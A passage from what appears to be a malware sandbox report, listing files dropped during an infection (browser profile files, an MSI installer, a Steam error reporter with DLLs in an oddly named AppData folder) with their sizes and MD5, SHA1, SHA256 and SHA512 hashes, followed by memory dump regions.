SHA256 f889a8851ba217e33662fa912373f3c33109902c297a0f18f3835daf5dbf5d11
SHA512 aeca92f428dbcde8d591e158dc47d0189ffedbdaccc19ca7a721f124401f9c8f985319051f05c1f3b226e98a31800a7dc8bd6c0d24209f41682be971507802e2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize 1KB
MD5 4bae4815fe57d527269780614790dc53
SHA1 2d339f8e1318fe7997e1ad967ecdaa8f30f9f54b
SHA256 1a9addd9e50a430a2490ddc23961128b6795f08366b643d47f50ae5c4fd3553b
SHA512 ebddd637aa614664be31eb1a2989b3fcf3955b57be89be516c19c3efdb93b9458a66388967bc3be26d0e8b75501343c6f164ca201cc180246c5297c50c568a55
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
Filesize 2B
MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize 356B
MD5 f839fc14286e670f18f191b5d60071e1
SHA1 77858687c31bfd1dc536319939db1bdfe45c7de8
SHA256 60ae6a6101369f4feb6c505cb730cbc7f3445dc21acb2831f9063b9eeb5f39f0
SHA512 5e5969115224fcc284bdbe64243fd2025b6864918b5222e3d90ae3976b6626be5ad05f68b19a1d1b2d0aa6d92bb1eaa3f92cc15ec99c211041fc0a1c0fec1228
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize 7KB
MD5 2904edfb1359d14bddd443b0ff6abe7b
SHA1 a99cf1df0539c2fddd431a7e26c806cd53288e7d
SHA256 bf7def095492062a9e33f6227c21bcf34e7c9b6101c762bc768ff21f109dd950
SHA512 7d2833bea1a92e43551c89a5c29a3386cff2ca7381c9b70e3e31aa9fc15155ff45deef89aab75d04b494939135f4a54ee7016306402a48d06d310b99f367d5ed
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize 16KB
MD5 6baf3d11062b6c240b20ffe12398a045
SHA1 5bcf0dce49c59beac77c8a5e9d3f87172ba824e4
SHA256 e2b1bf327253208670a4bdb4dcd9a6fe3217d881bc3a1e504a082c36f19c5294
SHA512 ad6f01b2bef29c83fcfb109c7ebf57bcba97c07a14cbdc29bed1bd7c7b4de70cbbf69c8e282f705a5a37b0a87d626bc46aa5d26e4f508dcd71f0a6a210d2ca92
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
Filesize 264KB
MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize 152B
MD5 a74887034b3a720c50e557d5b1c790bf
SHA1 fb245478258648a65aa189b967590eef6fb167be
SHA256 f25b27187fad2b82ac76fae98dfdddc1c04f4e8370d112d45c1dd17a8908c250
SHA512 888c3fceb1a28a41c5449f5237ca27c7cbd057ce407f1542973478a31aa84ce9b77943130ca37551c31fa7cd737b9195b7374f886a969b39148a531530a91af3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize 152B
MD5 64f055a833e60505264595e7edbf62f6
SHA1 dad32ce325006c1d094b7c07550aca28a8dac890
SHA256 7172dc46924936b8dcee2d0c39535d098c2dbf510402c5bbb269399aed4d4c99
SHA512 86644776207d0904bc3293b4fec2fa724b8b3c9c3086cd0ef2696027ab3d840a8049b6bde3464c209e57ffa83cbc3df6115500fbe36a9acb222830c1aac4dc7a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
Filesize 42KB
MD5 f7189700993d4198ee96bd6af5569539
SHA1 1ad2e11bb23ac04c9eebba69fe755fb27fcda164
SHA256 2447d53bd765b1f2c752ffda92b6f9a1dcabda1e4edc4d7496797f6cefdebf23
SHA512 3b5522068842502f5f6dcb6678248746eabdcdeb25e21d21fb0c9e446b75eb97077f15be7ca8e5b04abd4094bc7cc8ac8452c74a946d369614ee4e77a91753b5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize 1KB
MD5 1a808ff2bacdf9394dd940e2dfc195fb
SHA1 2f85130ca23bc1c3a5c4d91b990b1ec718c9801e
SHA256 3896106fb49253fd46bd32ae262d0d6b56096116f0f3458ae56198a5299a932f
SHA512 2310fefb4a2f0783b7ec4cc042e674b4e82dae76966df6c591c90e2ac0ebdcc8b2160a85c40d8e79326647100ae72c91fcd709cb629a3c18c742c627ea50a30c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize 764B
MD5 1e2f1192bb5150f9525640bff75a053a
SHA1 8a12cf548c4e32af30e416eb3c97f95e465868ab
SHA256 836b323f070c4c7c667bd0d02613385acbb8d7aaa31f4536633ef69ff25d82b3
SHA512 b41a953e998ead0df9002a9149a17e924ed1ec3896bca3f4063e1c7732ac3aea5ab07ea0605fed4cf7f973c10eb007a37eecb5db1dfa0cbbdb91d76b29056f2e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize 5KB
MD5 56c7aeab1c0a379009d134bd6563a0e9
SHA1 f1f2d97458d6409c293d17bd4d48cb2b9c5396c3
SHA256 f13708a48fba65a921855382621a5f2e4960566459a6396728d82dccbf216428
SHA512 54c36115f0ba37caf5af75cf0239672f66bf113982ff9c47ee2ec88be978cb54164e94529be319075dbef7b0e698c3871c118d526f3585e0d78dace3925d50cc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize 6KB
MD5 161ea1e5ea613d78ec3ddff2c82efc8f
SHA1 d47588a27b945630ea8724829aa1935fc49a58ab
SHA256 7ef406720866e48ad958bc4d51bfa0c4f8a27656954db532a15f99161e2bcd4f
SHA512 b70f56a08a44308d1f7de0ac8d94d29301137aa3030a0b089ade49c8b0a62bbcf063043a8505dd382174330ccbf1a8734d71f839121fbe9e6494696686240b21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize 6KB
MD5 4349994a1bd73fb86adc74b0e9ceabd1
SHA1 d08c84d55d1b7b56095066f5a953e644ac4b9485
SHA256 92fa6c8135f15b45c56912deefdf1fda0c8a165348018b7dc5ce2556bc4c8361
SHA512 ef3f18f6b7d86cfd0063e8673888d6c0c917e75a046cd6c8f5316dbdf071d64b6a816276d8d10e9b49bc50ee9928f458303ad34f8dd98ba9e460e1873a4002e7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize 16B
MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize 11KB
MD5 6c9ac705121868bd09a56deb88432ed7
SHA1 7cceb6c78f942cd1ddefd5f6fa54cb540c760d52
SHA256 d8775c1b9acaa8c3bde824eda4c0a497ee903ae892a13beeb6d6378915822d49
SHA512 4e5d53510794d882fd44ae7af01e6b25bacfd62746f4299557b9a4c2239cb14a7c6378e360948d6fe647ac88325c964ed8a3a167bbd0585f159d5af47b270601
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize 11KB
MD5 9dff03c3ab998a0e28275569c6462aad
SHA1 7a0b442672bde2847fbb4b11e775c46f398e77d1
SHA256 cb07cbd97c4eca5e1ab7dde87372aeb0d9fa11fafe8500bec640a4a45f3b4421
SHA512 63750dc671bf27ad00f7ce0e0aacf929b03b0fa5146b9003b89300c4dad71d1b5a2d8a59e53d287b1fe4bcabd39a6adc10c458706da612f27463424250c484ff
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v4uobbek.zbr.ps1
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\UnRAR.exe
Filesize 494KB
MD5 98ccd44353f7bc5bad1bc6ba9ae0cd68
SHA1 76a4e5bf8d298800c886d29f85ee629e7726052d
SHA256 e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
SHA512 d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\ruw9eigh.rar
Filesize 373KB
MD5 3bb1ffe94c9dbb62a7d25f3c284a8b0a
SHA1 3252e94a08282832877209a21f9635454c9214e4
SHA256 61317fbab24ad8b0c043c391b501a8c2850c0e82a466b7c6ccadf9cf1fcd78e9
SHA512 92adcc8abf1d5575c668fac7470321160519000976c044b72f3e4d79ff1571b72d9adf4689e0608d8bbe121b52a58c32f2e8825980fb8285a7383dab77ca5127
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\steamerrorreporter64.exe
Filesize 639KB
MD5 fd3ce044ac234fdab3df9d7f492c470a
SHA1 a74a287d5d82a8071ab36c72b2786342d83a8ef7
SHA256 0a0c09753b5103e86e32c2d8086dd1399f0d97a00e1525ec9c390067cdb242ba
SHA512 86d7e805fab0e5130003facbb1525ee261440846f342f53ae64c3f8d676d1208d5fd9bd91e3222c63cc30c443348eb5ddedab14c8847dae138fba7e9be69d08d
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\tier0_s64.dll
Filesize 386KB
MD5 7e60404cfb232a1d3708a9892d020e84
SHA1 31328d887bee17641608252fb2f9cd6caf8ba522
SHA256 5a3e15cb90baf4b3ebe0621fa6f5f37b0fe99848387d6f2fd99ae770d1e6d766
SHA512 4d8abd59bd77bdb6e5b5e5f902d2a10fa5136437c51727783e79aed6a796f9ee1807faf14f1a72a1341b9f868f61de8c676b00a4b07a2a26cfb8a4db1b77eb3c
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\vstdlib_s64.dll
Filesize 995KB
MD5 c8d22143c0ea5feb023abe4074e4a926
SHA1 4f857d5614b79ca337b5bce9292e7f1cad7cc934
SHA256 5d7936ac0a5dca5e397e1540a1d5e36bf16fda618f5fb096aec20c10999e853c
SHA512 cae75aac582c2a232cfae37bdb8184ba1f2db1ac1fb634032db57ea8e0fc448ee23c3ca300ba0db831d6eb656e1fd6652e05b1fae182cda9099dd06ce29f8b18
-
C:\Windows\Installer\MSI7BD7.tmp
Filesize 738KB
MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591
-
C:\Windows\Installer\MSI7C96.tmp
Filesize 1.1MB
MD5 1a2b237796742c26b11a008d0b175e29
SHA1 cfd5affcfb3b6fd407e58dfc7187fad4f186ea18
SHA256 81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730
SHA512 3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5
-
C:\Windows\Installer\MSI840C.tmp
Filesize 364KB
MD5 54d74546c6afe67b3d118c3c477c159a
SHA1 957f08beb7e27e657cd83d8ee50388b887935fae
SHA256 f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611
SHA512 d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f
-
C:\Windows\Installer\e577b89.msi
Filesize 25.2MB
MD5 3d87a0e5517c9a8fc4adde50bafe7c76
SHA1 a1ba3b688dcb9b17ed1d430f3032e2884a0565e4
SHA256 49dc002fa1a0a1e33621a7d9340fb7bd0ac8b9834fc5958823d1f2bed6fa5956
SHA512 ebadfdc465dc5c32c854931a9f8712320cfc3752e04b3fec56a1b103c6f225c1de0c6892b1cd90b362f56d38685b8d5851e2cbefdf3291f8389b5cea2e337042
-
\??\pipe\LOCAL\crashpad_948_IJGTPDKMOTGBOIID
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1548-185-0x0000000000A90000-0x0000000000A99000-memory.dmp
Filesize 36KB
-
memory/1548-190-0x00000000772A0000-0x00000000774F2000-memory.dmp
Filesize 2.3MB
-
memory/1548-188-0x00007FFB3F840000-0x00007FFB3FA49000-memory.dmp
Filesize 2.0MB
-
memory/1548-187-0x0000000002760000-0x0000000002B60000-memory.dmp
Filesize 4.0MB
-
memory/1896-182-0x00007FFB3F840000-0x00007FFB3FA49000-memory.dmp
Filesize 2.0MB
-
memory/1896-184-0x00000000772A0000-0x00000000774F2000-memory.dmp
Filesize 2.3MB
-
memory/1896-181-0x0000000004720000-0x0000000004B20000-memory.dmp
Filesize 4.0MB
-
memory/1896-192-0x0000000000F90000-0x0000000000FB8000-memory.dmp
Filesize 160KB
-
memory/1896-180-0x0000000004720000-0x0000000004B20000-memory.dmp
Filesize 4.0MB
-
memory/1896-156-0x0000000000F90000-0x0000000000FB8000-memory.dmp
Filesize 160KB
-
memory/1896-154-0x0000000000F90000-0x0000000000FB8000-memory.dmp
Filesize 160KB
-
memory/1896-155-0x0000000000F90000-0x0000000000FB8000-memory.dmp
Filesize 160KB
-
memory/3360-163-0x000001D6591D0000-0x000001D6591F2000-memory.dmp
Filesize 136KB
-
memory/4172-151-0x000001AE41720000-0x000001AE41745000-memory.dmp
Filesize 148KB
-
memory/4172-150-0x000001AE41710000-0x000001AE41711000-memory.dmp
Filesize 4KB